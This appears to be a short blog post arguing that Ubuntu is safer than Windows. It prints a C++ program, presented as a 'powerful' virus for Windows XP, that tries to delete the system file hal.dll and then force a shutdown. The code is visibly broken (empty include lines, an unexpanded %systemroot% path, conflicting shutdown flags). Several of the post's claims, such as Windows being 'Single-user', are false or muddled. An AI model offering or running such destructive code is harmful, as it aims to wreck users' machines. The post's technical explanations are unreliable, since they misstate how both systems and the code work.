Windows Insecurity and Ubuntu
The growing risk of Virus-infections in Microsoft Windows is steadily on increase. The growing rate of Programming language awareness is creating a problem for Windows users. For example, the following a powerful C++ virus code designed for Windows XP. Once the .exe file is used, we can say that the user's Windows installation is damaged. #include #include using namespace std; int main(int argc, char *argv[]) { std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME system("shutdown -s -r"); system("PAUSE"); return EXIT_SUCCESS; } The Code here will immediately shutdown the Machine once it is booted. So, the best thing to remain safe is the use of a Power-User or Standard-User account. But the Privilege escalation System, easily defeats those precautions. Now you can ask me, why is Ubuntu safe then? Ubuntu is Multi-user, while Windows is Single-user. So, the Shutdown command in Windows can even be issued by a general User, while the shutdown/poweroff command is root/superuser/admin command in Ubuntu. Still, the recent Advancements in UAC has guarenteed some safety at least.
